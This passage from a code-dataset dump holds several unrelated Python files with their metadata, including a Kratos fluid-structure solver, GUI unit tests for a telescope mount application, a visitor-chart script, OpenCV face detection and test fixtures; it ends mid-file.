must coincide.'\n raise Exception(err_msg)\n\n return fluid_time_step\n\n def _GetNodalUpdateUtilities(self):\n structure_time_scheme = self.structure_solver.settings[\"scheme_type\"].GetString()\n if (structure_time_scheme == \"newmark\"):\n damp_factor_m = 0.0\n elif (structure_time_scheme == \"bossak\"):\n damp_factor_m = -0.3\n else:\n err_msg = \"Requested structure time scheme type \\\"\" + structure_time_scheme + \"\\\" is not available!\\n\"\n err_msg += \"Available options are: \\\"newmark\\\", \\\"bossak\\\", \\\"relaxation\\\"\"\n raise Exception(err_msg)\n\n if (self.domain_size == 2):\n return KratosFSI.NodalUpdateNewmark2D(damp_factor_m)\n else:\n return KratosFSI.NodalUpdateNewmark3D(damp_factor_m)\n\n def _GetPartitionedFSIUtilities(self):\n if (self.domain_size == 2):\n return KratosFSI.PartitionedFSIUtilitiesArray2D()\n else:\n return KratosFSI.PartitionedFSIUtilitiesArray3D()\n\n def _SetUpMapper(self):\n # Recall, to set the INTERFACE flag in both the fluid and solid interface before the mapper construction\n search_radius_factor = 2.0\n mapper_max_iterations = 200\n mapper_tolerance = 1e-12\n\n mappers_settings = self.settings[\"coupling_settings\"][\"mapper_settings\"]\n\n if (mappers_settings.size() == 1):\n fluid_submodelpart_name = mappers_settings[0][\"fluid_interface_submodelpart_name\"].GetString()\n structure_submodelpart_name = mappers_settings[0][\"structure_interface_submodelpart_name\"].GetString()\n\n fluid_submodelpart = self.fluid_solver.main_model_part.GetSubModelPart(fluid_submodelpart_name)\n structure_submodelpart = self.structure_solver.main_model_part.GetSubModelPart(structure_submodelpart_name)\n\n self.interface_mapper = NonConformant_OneSideMap.NonConformant_OneSideMap(fluid_submodelpart,\n structure_submodelpart,\n search_radius_factor,\n mapper_max_iterations,\n mapper_tolerance)\n\n self.double_faced_structure = False\n\n elif (mappers_settings.size() == 2):\n # Get the fluid interface faces submodelpart names\n for mapper_id in range(2):\n if (mappers_settings[mapper_id][\"mapper_face\"].GetString() == \"Positive\"):\n pos_face_submodelpart_name = mappers_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n elif (mappers_settings[mapper_id][\"mapper_face\"].GetString() == \"Negative\"):\n neg_face_submodelpart_name = mappers_settings[mapper_id][\"fluid_interface_submodelpart_name\"].GetString()\n else:\n raise Exception(\"Unique mapper flag has been set but more than one mapper exist in mapper_settings.\")\n # Get the structure submodelpart name\n structure_submodelpart_name = mappers_settings[0][\"structure_interface_submodelpart_name\"].GetString()\n\n # Grab the interface submodelparts\n pos_fluid_submodelpart = self.fluid_solver.main_model_part.GetSubModelPart(pos_face_submodelpart_name)\n neg_fluid_submodelpart = self.fluid_solver.main_model_part.GetSubModelPart(neg_face_submodelpart_name)\n structure_submodelpart = self.structure_solver.main_model_part.GetSubModelPart(structure_submodelpart_name)\n\n self.interface_mapper = NonConformant_OneSideMap.NonConformantTwoFaces_OneSideMap(pos_fluid_submodelpart,\n neg_fluid_submodelpart,\n structure_submodelpart,\n search_radius_factor,\n mapper_max_iterations,\n mapper_tolerance)\n\n self.double_faced_structure = True\n\n else:\n raise Exception(\"Case with more than 2 mappers has not been implemented yet.\\n \\\n Please, in case you are using single faced immersed bodies, set the skin entities in a unique submodelpart.\\n \\\n In case you are considering double faced immersed bodies (shells or membranes), set all the positive faces \\\n in a unique submodelpart and all the negative ones in another submodelpart.\")\n\n def _SetStructureNeumannCondition(self):\n\n structure_computational_submodelpart = self.structure_solver.GetComputingModelPart()\n\n # Get the maximum condition id\n max_cond_id = 0\n for condition in self.structure_solver.main_model_part.Conditions:\n max_cond_id = max(max_cond_id, condition.Id)\n\n max_cond_id = self.structure_solver.main_model_part.GetCommunicator().GetDataCommunicator().MaxAll(max_cond_id)\n\n # Set up the point load condition in the structure interface\n structure_interfaces_list = self.settings[\"coupling_settings\"][\"structure_interfaces_list\"]\n for i in range(structure_interfaces_list.size()):\n interface_submodelpart_name = structure_interfaces_list[i].GetString()\n interface_submodelpart_i = self.structure_solver.main_model_part.GetSubModelPart(interface_submodelpart_name)\n\n # Get the number of conditions to be set in each processor\n local_nodes_number_accumulated = -1\n local_nodes_number = len(interface_submodelpart_i.GetCommunicator().LocalMesh().Nodes)\n local_nodes_number_accumulated = interface_submodelpart_i.GetCommunicator().ScanSum(local_nodes_number, local_nodes_number_accumulated)\n\n # Create the point load condition\n aux_count = max_cond_id + local_nodes_number_accumulated\n if self.domain_size == 2:\n for node in interface_submodelpart_i.GetCommunicator().LocalMesh().Nodes:\n aux_count+=1\n structure_computational_submodelpart.CreateNewCondition(\"PointLoadCondition2D1N\",\n int(aux_count),\n [node.Id],\n self.structure_solver.main_model_part.Properties[0])\n elif self.domain_size == 3:\n for node in interface_submodelpart_i.GetCommunicator().LocalMesh().Nodes:\n aux_count+=1\n structure_computational_submodelpart.CreateNewCondition(\"PointLoadCondition3D1N\",\n int(aux_count),\n [node.Id],\n self.structure_solver.main_model_part.Properties[0])\n\n def _ComputeMeshPredictionSingleFaced(self):\n\n print(\"Computing time step \",self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.STEP],\" prediction...\")\n # Get the previous step fluid interface nodal fluxes\n keep_sign = False\n distribute_load = True\n self.interface_mapper.FluidToStructure_VectorMap(KratosMultiphysics.REACTION,\n KratosStructural.POINT_LOAD,\n keep_sign,\n distribute_load)\n\n # Solve the current step structure problem with the previous step fluid interface nodal fluxes\n self.structure_solver.SolveSolutionStep()\n\n # Map the obtained structure displacement to the fluid interface\n keep_sign = True\n distribute_load = False\n self.interface_mapper.StructureToFluid_VectorMap(KratosMultiphysics.DISPLACEMENT,\n KratosMultiphysics.MESH_DISPLACEMENT,\n keep_sign,\n distribute_load)\n\n # Solve the mesh problem\n self.mesh_solver.InitializeSolutionStep()\n self.mesh_solver.Predict()\n self.mesh_solver.SolveSolutionStep()\n self.mesh_solver.FinalizeSolutionStep()\n\n print(\"Mesh prediction computed.\")\n\n\n def _ComputeMeshPredictionDoubleFaced(self):\n\n print(\"Computing time step \",self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.STEP],\"double faced prediction...\")\n # Get the previous step fluid interface nodal fluxes from both positive and negative faces\n keep_sign = False\n distribute_load = True\n self.interface_mapper.PositiveFluidToStructure_VectorMap(KratosMultiphysics.REACTION,\n KratosFSI.POSITIVE_MAPPED_VECTOR_VARIABLE,\n keep_sign,\n distribute_load)\n self.interface_mapper.NegativeFluidToStructure_VectorMap(KratosMultiphysics.REACTION,\n KratosFSI.NEGATIVE_MAPPED_VECTOR_VARIABLE,\n keep_sign,\n distribute_load)\n\n # Add the two faces contributions to the POINT_LOAD variable\n # TODO: Add this to the variables utils\n for node in self._GetStructureInterfaceSubmodelPart().Nodes:\n pos_face_force = node.GetSolutionStepValue(KratosFSI.POSITIVE_MAPPED_VECTOR_VARIABLE)\n neg_face_force = node.GetSolutionStepValue(KratosFSI.NEGATIVE_MAPPED_VECTOR_VARIABLE)\n node.SetSolutionStepValue(KratosStructural.POINT_LOAD, 0, pos_face_force+neg_face_force)\n\n # Solve the current step structure problem with the previous step fluid interface nodal fluxes\n self.structure_solver.SolveSolutionStep()\n\n # Map the obtained structure displacement to both positive and negative fluid interfaces\n keep_sign = True\n distribute_load = False\n self.interface_mapper.StructureToPositiveFluid_VectorMap(KratosMultiphysics.DISPLACEMENT,\n KratosMultiphysics.MESH_DISPLACEMENT,\n keep_sign,\n distribute_load)\n self.interface_mapper.StructureToNegativeFluid_VectorMap(KratosMultiphysics.DISPLACEMENT,\n KratosMultiphysics.MESH_DISPLACEMENT,\n keep_sign,\n distribute_load)\n\n # Solve the mesh problem\n self.mesh_solver.InitializeSolutionStep()\n self.mesh_solver.Predict()\n self.mesh_solver.SolveSolutionStep()\n self.mesh_solver.FinalizeSolutionStep()\n\n print(\"Mesh prediction computed.\")\n","sub_path":"applications/FSIApplication/python_scripts/partitioned_fsi_base_solver.py","file_name":"partitioned_fsi_base_solver.py","file_ext":"py","file_size_in_byte":29665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"206891116","text":"############################################################\n# -*- coding: utf-8 -*-\n#\n# # # # # # #\n# ## ## # ## # #\n# # # # # # # # # # #\n# # ## # ## ## ######\n# # # # # # #\n#\n# Python-based Tool for interaction with the 10micron mounts\n# GUI with PyQT5 for python\n#\n# written in python3, (c) 2019-2021 by mworion\n# Licence APL2.0\n#\n###########################################################\n# standard libraries\nimport unittest.mock as mock\nimport pytest\nimport glob\nimport os\nimport gc\nimport shutil\n\n# external packages\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtGui import QCloseEvent\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QThreadPool\nfrom PyQt5.QtWidgets import QPushButton\nfrom PyQt5.QtCore import QTimer\nfrom mountcontrol.qtmount import Mount\nfrom skyfield.api import wgs84\nfrom skyfield.api import load\n\n# local import\nfrom tests.baseTestSetupMainWindow import App\nfrom gui.mainWindow.mainW import MainWindow\n\n\n@pytest.fixture(autouse=True, scope='module')\ndef module(qapp):\n yield\n\n\n@pytest.fixture(autouse=True, scope='function')\ndef function(module):\n\n window = MainWindow(App())\n yield window\n\n\ndef test_mwSuper(function):\n suc = function.mwSuper('')\n assert suc\n\n\ndef test_initConfig_1(function):\n function.app.config['mainW'] = {}\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.initConfig()\n assert suc\n\n\ndef test_initConfig_2(function):\n del function.app.config['mainW']\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.initConfig()\n assert suc\n\n\ndef test_initConfig_3(function):\n function.app.config['mainW'] = {}\n function.app.config['mainW']['winPosX'] = 10000\n function.app.config['mainW']['winPosY'] = 10000\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.initConfig()\n assert suc\n\n\ndef test_storeConfigExtendedWindows_1(function):\n suc = function.storeConfigExtendedWindows()\n assert suc\n\n\ndef test_storeConfig_1(function):\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.storeConfig()\n assert suc\n\n\ndef test_storeConfig_2(function):\n del function.app.config['mainW']\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.storeConfig()\n assert suc\n\n\ndef test_closeEvent_1(function, qtbot):\n function.closeEvent(QCloseEvent())\n\n\ndef test_quitSave_1(function, qtbot):\n function.ui.profile.setText('test')\n suc = function.quitSave()\n assert suc\n\n\ndef test_setupIcons(function):\n suc = function.setupIcons()\n assert suc\n\n\ndef test_updateMountConnStat_1(function):\n suc = function.updateMountConnStat(True)\n assert suc\n assert function.deviceStat['mount']\n\n\ndef test_updateMountConnStat_2(function):\n suc = function.updateMountConnStat(False)\n assert suc\n assert not function.deviceStat['mount']\n\n\ndef test_updateMountWeatherStat_1(function):\n class S:\n weatherPressure = None\n weatherTemperature = None\n weatherStatus = None\n\n suc = function.updateMountWeatherStat(S())\n assert suc\n assert function.deviceStat['directWeather'] is None\n\n\ndef test_updateMountWeatherStat_2(function):\n class S:\n weatherPressure = 1000\n weatherTemperature = 10\n weatherStatus = None\n\n suc = function.updateMountWeatherStat(S())\n assert suc\n assert not function.deviceStat['directWeather']\n\n\ndef test_updateMountWeatherStat_3(function):\n class S:\n weatherPressure = 1000\n weatherTemperature = 10\n weatherStatus = True\n\n suc = function.updateMountWeatherStat(S())\n assert suc\n assert function.deviceStat['directWeather']\n\n\ndef test_smartFunctionGui_1(function):\n function.deviceStat['mount'] = True\n function.deviceStat['camera'] = True\n function.deviceStat['astrometry'] = True\n function.app.data.buildP = [(0, 0)]\n suc = function.smartFunctionGui()\n assert suc\n assert function.ui.runModel.isEnabled()\n assert function.ui.plateSolveSync.isEnabled()\n\n\ndef test_smartFunctionGui_2(function):\n function.deviceStat['mount'] = True\n function.deviceStat['camera'] = False\n function.deviceStat['astrometry'] = True\n function.app.data.buildP = [(0, 0)]\n suc = function.smartFunctionGui()\n assert suc\n assert not function.ui.runModel.isEnabled()\n assert not function.ui.plateSolveSync.isEnabled()\n\n\ndef test_smartFunctionGui_3(function):\n function.deviceStat['mount'] = True\n suc = function.smartFunctionGui()\n assert suc\n assert function.ui.batchModel.isEnabled()\n\n\ndef test_smartFunctionGui_4(function):\n function.deviceStat['mount'] = False\n suc = function.smartFunctionGui()\n assert suc\n assert not function.ui.batchModel.isEnabled()\n\n\ndef test_smartFunctionGui_5(function):\n function.deviceStat['environOverall'] = None\n suc = function.smartFunctionGui()\n assert suc\n assert not function.ui.refractionGroup.isEnabled()\n assert not function.ui.setRefractionManual.isEnabled()\n\n\ndef test_smartFunctionGui_6(function):\n function.deviceStat['environOverall'] = True\n function.deviceStat['mount'] = True\n suc = function.smartFunctionGui()\n assert suc\n assert function.ui.refractionGroup.isEnabled()\n assert function.ui.setRefractionManual.isEnabled()\n\n\ndef test_smartFunctionGui_7(function):\n function.deviceStat['environOverall'] = True\n function.deviceStat['mount'] = False\n suc = function.smartFunctionGui()\n assert suc\n assert not function.ui.refractionGroup.isEnabled()\n assert not function.ui.setRefractionManual.isEnabled()\n\n\ndef test_smartTabGui_1(function):\n suc = function.smartTabGui()\n assert suc\n\n\ndef test_mountBoot1(function, qtbot):\n with mock.patch.object(function.app.mount,\n 'bootMount',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountBoot()\n assert suc\n assert ['Sent boot command to mount', 0] == blocker.args\n\n\ndef test_smartEnvironGui_1(function):\n function.deviceStat['directWeather'] = False\n function.deviceStat['sensorWeather'] = False\n function.deviceStat['onlineWeather'] = False\n function.deviceStat['skymeter'] = False\n function.deviceStat['powerWeather'] = False\n suc = function.smartEnvironGui()\n assert suc\n assert not function.ui.directWeatherGroup.isEnabled()\n assert not function.ui.sensorWeatherGroup.isEnabled()\n assert not function.ui.onlineWeatherGroup.isEnabled()\n assert not function.ui.skymeterGroup.isEnabled()\n assert not function.ui.powerGroup.isEnabled()\n\n\ndef test_smartEnvironGui_2(function):\n function.deviceStat['directWeather'] = True\n function.deviceStat['sensorWeather'] = True\n function.deviceStat['onlineWeather'] = True\n function.deviceStat['skymeter'] = True\n function.deviceStat['powerWeather'] = True\n suc = function.smartEnvironGui()\n assert suc\n assert function.ui.directWeatherGroup.isEnabled()\n assert function.ui.sensorWeatherGroup.isEnabled()\n assert function.ui.onlineWeatherGroup.isEnabled()\n assert function.ui.skymeterGroup.isEnabled()\n assert function.ui.powerGroup.isEnabled()\n\n\ndef test_smartEnvironGui_3(function):\n function.deviceStat['directWeather'] = None\n function.deviceStat['sensorWeather'] = None\n function.deviceStat['onlineWeather'] = None\n function.deviceStat['skymeter'] = None\n function.deviceStat['powerWeather'] = False\n suc = function.smartEnvironGui()\n assert suc\n assert not function.ui.directWeatherGroup.isEnabled()\n assert not function.ui.sensorWeatherGroup.isEnabled()\n assert not function.ui.onlineWeatherGroup.isEnabled()\n assert not function.ui.skymeterGroup.isEnabled()\n assert not function.ui.powerGroup.isEnabled()\n\n\ndef test_updateWindowsStats_1(function):\n function.function.uiWindows = {'showMessageW': {'classObj': 1,\n 'button': QPushButton()}}\n suc = function.updateWindowsStats()\n assert suc\n\n\ndef test_updateDeviceStats_1(function):\n function.deviceStat = {'online': True}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n assert function.deviceStat['environOverall']\n\n\ndef test_updateDeviceStats_2(function):\n function.deviceStat = {'test': True}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n assert function.deviceStat['environOverall'] is None\n\n\ndef test_updateDeviceStats_3(function):\n function.deviceStat = {'online': True}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n\n\ndef test_updateDeviceStats_4(function):\n function.deviceStat = {}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n\n\ndef test_updateOnlineWeatherStat_1(function):\n suc = function.updateOnlineWeatherStat(True)\n assert suc\n assert function.deviceStat['onlineWeather']\n\n\ndef test_updateOnlineWeatherStat_2(function):\n suc = function.updateOnlineWeatherStat(False)\n assert suc\n assert not function.deviceStat['onlineWeather']\n\n\ndef test_updateTime_1(function):\n function.ui.isOnline.setChecked(True)\n suc = function.updateTime()\n assert suc\n\n\ndef test_updateTime_2(function):\n function.ui.isOnline.setChecked(False)\n suc = function.updateTime()\n assert suc\n\n\ndef test_updateAstrometryStatus(function):\n suc = function.updateAstrometryStatus('test')\n assert suc\n assert function.ui.astrometryText.text() == 'test'\n\n\ndef test_updateDomeStatus(function):\n suc = function.updateDomeStatus('test')\n assert suc\n assert function.ui.domeText.text() == 'test'\n\n\ndef test_updateCameraStatus(function):\n suc = function.updateCameraStatus('test')\n assert suc\n assert function.ui.cameraText.text() == 'test'\n\n\ndef test_updateStatusGUI_1(function):\n class OB:\n @staticmethod\n def statusText(function):\n return None\n\n function.app.mount.obsSite.status = 0\n suc = function.updateStatusGUI(OB)\n assert suc\n\n\ndef test_updateStatusGUI_2(function):\n class OB:\n @staticmethod\n def statusText(function):\n return 'test'\n\n function.app.mount.obsSite.status = 0\n suc = function.updateStatusGUI(OB)\n assert suc\n assert function.ui.statusText.text() == 'test'\n\n\ndef test_updateStatusGUI_3(function):\n class OB:\n @staticmethod\n def statusText(function):\n return None\n\n function.app.mount.obsSite.status = 5\n suc = function.updateStatusGUI(OB)\n assert suc\n\n\ndef test_updateStatusGUI_4(function):\n class OB:\n @staticmethod\n def statusText(function):\n return None\n\n function.app.mount.obsSite.status = 1\n suc = function.updateStatusGUI(OB)\n assert suc\n\n\ndef test_deleteWindowResource_1(function):\n suc = function.deleteWindowResource()\n assert not suc\n\n\ndef test_deleteWindowResource_2(function):\n suc = function.deleteWindowResource(widget=function.ui.openImageW)\n assert suc\n\n\ndef test_deleteWindowResource_3(function):\n class Test:\n @staticmethod\n def objectName(function):\n return 'ImageDialog'\n\n with mock.patch.object(gc,\n 'collect'):\n suc = function.deleteWindowResource(widget=Test())\n assert suc\n\n\ndef test_buildWindow_1(function):\n class Test(QObject):\n destroyed = pyqtSignal()\n\n function.uiWindows['showImageW']['classObj'] = Test()\n\n suc = function.buildWindow('showImageW')\n assert suc\n\n\ndef test_toggleWindow_1(function):\n suc = function.toggleWindow()\n assert suc\n\n\ndef test_toggleWindow_2(function):\n def Sender(function):\n return function.ui.openImageW\n\n function.sender = Sender\n function.uiWindows['showImageW']['classObj'] = None\n\n with mock.patch.object(function,\n 'buildWindow'):\n suc = function.toggleWindow()\n assert suc\n\n\ndef test_toggleWindow_3(function):\n def Sender(function):\n return function.ui.openImageW\n\n function.sender = Sender\n function.uiWindows['showImageW']['classObj'] = 1\n\n suc = function.toggleWindow()\n assert suc\n\n\ndef test_showExtendedWindows_1(function):\n with mock.patch.object(function,\n 'buildWindow'):\n suc = function.showExtendedWindows()\n assert suc\n\n\ndef test_closeExtendedWindows_1(function):\n suc = function.closeExtendedWindows()\n assert suc\n\n\ndef test_checkExtension_1(function):\n val = function.checkExtension('tests/image/test.fit', 'fit')\n assert val == 'tests/image/test.fit'\n\n\ndef test_checkExtension_2(function):\n val = function.checkExtension('tests/image/test', '.fit')\n assert val == 'tests/image/test.fit'\n\n\ndef test_mountBoot2(function, qtbot):\n with mock.patch.object(function.app.mount,\n 'bootMount',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountBoot()\n assert not suc\n assert ['Mount cannot be booted', 2] == blocker.args\n\n\ndef test_mountShutdown1(function, qtbot):\n with mock.patch.object(function.app.mount.obsSite,\n 'shutdown',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountShutdown()\n assert suc\n assert ['Shutting mount down', 0] == blocker.args\n\n\ndef test_mountShutdown2(function, qtbot):\n with mock.patch.object(function.app.mount.obsSite,\n 'shutdown',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountShutdown()\n assert not suc\n assert ['Mount cannot be shutdown', 2] == blocker.args\n\n\ndef test_saveProfile1(function, qtbot):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n app.saveProfile()\n assert ['Actual profile saved', 0] == blocker.args\n\n\ndef test_loadProfile1(function, qtbot):\n with mock.patch.object(function,\n 'openFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'loadConfig',\n return_value=True):\n with mock.patch.object(function,\n 'closeExtendedWindows'):\n with mock.patch.object(function,\n 'showExtendedWindows'):\n with mock.patch.object(function,\n 'initConfig'):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.loadProfile()\n assert suc\n assert ['Profile [test] loaded', 0] == blocker.args\n\n\ndef test_loadProfile2(function, qtbot):\n with mock.patch.object(function,\n 'openFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'loadConfig',\n return_value=False):\n with mock.patch.object(function,\n 'closeExtendedWindows'):\n with mock.patch.object(function,\n 'showExtendedWindows'):\n with mock.patch.object(function,\n 'initConfig'):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.loadProfile()\n assert suc\n assert ['Profile [test] cannot no be loaded', 2] == blocker.args\n\n\ndef test_loadProfile3(function, qtbot):\n with mock.patch.object(function,\n 'openFile',\n return_value=(None, None, 'cfg')):\n suc = function.loadProfile()\n assert not suc\n\n\ndef test_saveProfileAs1(function, qtbot):\n with mock.patch.object(function,\n 'saveFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.saveProfileAs()\n assert suc\n assert ['Profile [test] saved', 0] == blocker.args\n\n\ndef test_saveProfileAs2(function, qtbot):\n with mock.patch.object(function,\n 'saveFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.saveProfileAs()\n assert suc\n assert ['Profile [test] cannot no be saved', 2] == blocker.args\n\n\ndef test_saveProfileAs3(function, qtbot):\n with mock.patch.object(function,\n 'saveFile',\n return_value=(None, None, 'cfg')):\n suc = function.saveProfileAs()\n assert not suc\n\n\ndef test_saveProfile2(function, qtbot):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n function.saveProfile()\n assert ['Actual profile cannot not be saved', 2] == blocker.args\n\n\ndef test_remoteCommand_1(function):\n suc = function.remoteCommand('')\n assert suc\n\n\ndef test_remoteCommand_2(function, qtbot):\n with qtbot.waitSignal(function.app.message) as blocker:\n with mock.patch.object(function.app,\n 'quitSave'):\n suc = function.remoteCommand('shutdown')\n assert suc\n assert ['Actual profile cannot not be saved', 2] == blocker.args\n\n\ndef test_remoteCommand_3(function, qtbot):\n with qtbot.waitSignal(function.app.message) as blocker:\n with mock.patch.object(function,\n 'mountShutdown'):\n suc = function.remoteCommand('shutdown mount')\n assert suc\n assert ['Shutdown mount remotely', 2] == blocker.args\n\n\ndef test_remoteCommand_4(function, qtbot):\n with qtbot.waitSignal(function.app.message) as blocker:\n with mock.patch.object(function,\n 'mountBoot'):\n suc = function.remoteCommand('boot mount')\n assert suc\n assert ['Boot mount remotely', 2] == blocker.args\n","sub_path":"tests/unit_tests/gui/mainWindow/t_mainW_new.py","file_name":"t_mainW_new.py","file_ext":"py","file_size_in_byte":19413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"45424318","text":"import csv\nimport pygal\nimport os\n\n#Returns info from the csv file as tuple\ndef get_file_info(file):\n\n\tJahr = []\n\tBesucher = []\n\tZeitProBesucher = []\n\tAnsichtszeitProBesucher = []\n\n\twith open(file) as csvfile:\n\t filereader = csv.DictReader(csvfile, delimiter = \";\")\n\n\t #Insert data into arrays\n\t for row in filereader:\n\t #print(row)\n\t Jahr.append(int(row[\"Jahr\"].split(\" \")[0]))\n\t Besucher.append(int(row[\"Besucher\"]))\n\t ZeitProBesucher.append(row[\"Ansichtszeit pro Seite\"])#\n\n\t Ansichtszeit = row[\"Ansichtszeit pro Besucher\"].split(\":\")\n\t Ansichtszeit.pop(0)\n\t TimeSec = int(Ansichtszeit[0]) * 60 + int(Ansichtszeit[1])\n\t \n\t AnsichtszeitProBesucher.append(TimeSec)\n\n\treturn (Jahr, Besucher, AnsichtszeitProBesucher)\n\n\nfile = \"Besucher pro Jahr_1_März2016.csv\"\nInfos = get_file_info(file)\n\n#Create chart\nchart = pygal.HorizontalBar()\nchart.title = \"Besucher pro Jahr auf Moers.de\"\n\ncounter = 0\nfor jahr in Infos[0]:\n\n\tchart.add(str(jahr) , Infos[1][counter])\n\tcounter += 1\n\n\nchart.render_to_file(\"user_per_year_chart.svg\", force_uri_protocol=\"https\")","sub_path":"besucher_jahr.py","file_name":"besucher_jahr.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"92363707","text":"# -*- coding: utf-8 -*-\n\n# 在工程之外加start_url\n\nfrom scrapy_redis.multione import StartUrl\nfrom scrapy_redis.queue import StartUrlQueue\n\ns = StartUrlQueue()\n\nfor i in range(20):\n url = 'http://cydj.5anquan.com/UILogin/BeforeUserInfoShow?id=' + str(i)\n start_url = StartUrl(url=url, callback='haina.parses.aqpjs.SafetyEvalueSpider.parse_info', dont_filter=True,\n priority=0)\n s.push(starturl=start_url)\n","sub_path":"examples/add_start_url.py","file_name":"add_start_url.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"140122969","text":"from datetime import datetime\n\nfrom django.utils import timezone\n\nimport pytest\n\nfrom apps.visits import choices\nfrom factories import visits as factories\n\n\n@pytest.fixture\ndef visit_no_reason(child):\n year = timezone.now().year\n day = datetime(year, 6, 1)\n return factories.VisitFactory(\n date=day,\n reason=choices.NO_REASON,\n child=child,\n description=None\n )\n\n\n@pytest.fixture\ndef visit_illness(child):\n year = timezone.now().year\n day = datetime(year, 6, 2)\n return factories.VisitFactory(\n date=day,\n reason=choices.ILLNESS,\n child=child,\n )\n","sub_path":"tests/fixtures/visits.py","file_name":"visits.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"411554275","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nprint(\"dgsg\")\n\n\n\ncap = cv2.VideoCapture(0)\nwhile True:\n \n \n ret , frame = cap.read(0) \n\n face_rects = face_cascade.detectMultiScale(frame,scaleFactor=1.2,minNeighbors= 5)\n \n for (x,y,w,h) in face_rects:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),10)\n \n cv2.imshow('video face detect',frame) \n \n k = cv2.waitKey(1)\n if k == 27:\n break\n \ncap.release()\ncv2.destroyAllWindows()","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"350827066","text":"from filelock import FileLock\nfrom subprocess import check_output, CalledProcessError\nimport shlex\nfrom tempfile import mkstemp\nimport yaml\nfrom unittest.mock import Mock\nfrom suzieq.poller.services import init_services\nfrom suzieq.utils import load_sq_config, Schema\nfrom suzieq.sqobjects import get_sqobject, get_tables\nfrom suzieq.cli.sq_nubia_context import NubiaSuzieqContext\nimport asyncio\nimport sys\nimport os\nfrom _pytest.mark.structures import Mark, MarkDecorator\nimport pytest\nimport pandas as pd\n\nsuzieq_cli_path = './suzieq/cli/sq_cli.py'\nsuzieq_rest_server_path = './suzieq/restServer/sq_rest_server.py'\n\nDATADIR = ['tests/data/multidc/parquet-out/',\n 'tests/data/eos/parquet-out',\n 'tests/data/nxos/parquet-out',\n 'tests/data/junos/parquet-out',\n 'tests/data/mixed/parquet-out',\n 'tests/data/vmx/parquet-out']\n\ncommands = [('AddressCmd'), ('ArpndCmd'), ('BgpCmd'), ('DeviceCmd'),\n ('DevconfigCmd'), ('EvpnVniCmd'), ('InterfaceCmd'),\n ('InventoryCmd'), ('LldpCmd'),\n ('MacCmd'), ('MlagCmd'), ('NetworkCmd'), ('OspfCmd'),\n ('SqPollerCmd'), ('RouteCmd'), ('TopologyCmd'), ('VlanCmd')]\n\ncli_commands = [('arpnd'), ('address'), ('bgp'), ('device'), ('devconfig'),\n ('evpnVni'), ('fs'), ('interface'), ('inventory'), ('lldp'),\n ('mac'), ('mlag'), ('network'), ('ospf'), ('path'), ('route'),\n ('sqPoller'), ('topology'), ('vlan')]\n\n\ntables = get_tables()\n\n\n@pytest.fixture(scope='function')\ndef setup_nubia():\n _setup_nubia()\n\n\n@pytest.fixture()\ndef create_context_config(datadir: str = './tests/data/basic_dual_bgp/parquet-out'):\n return\n\n\n@pytest.fixture()\ndef get_table_data(table: str, datadir: str):\n\n cfgfile = create_dummy_config_file(datadir=datadir)\n\n df = get_sqobject(table)(config_file=cfgfile).get(columns=['*'])\n if not df.empty and (table != 'device'):\n device_df = get_sqobject('device')(config_file=cfgfile) \\\n .get(columns=['namespace', 'hostname', 'os'])\n\n assert not device_df.empty, 'empty device table'\n df = df.merge(device_df, on=['namespace', 'hostname']) \\\n .fillna({'os': ''})\n\n if df.empty:\n pytest.fail('empty device table')\n\n return df\n\n\n@pytest.fixture\n@pytest.mark.asyncio\ndef init_services_default(event_loop):\n configs = os.path.abspath(os.curdir) + '/config/'\n schema = configs + 'schema/'\n mock_queue = Mock()\n services = event_loop.run_until_complete(\n init_services(configs, schema, mock_queue, True))\n return services\n\n\n@pytest.fixture\ndef 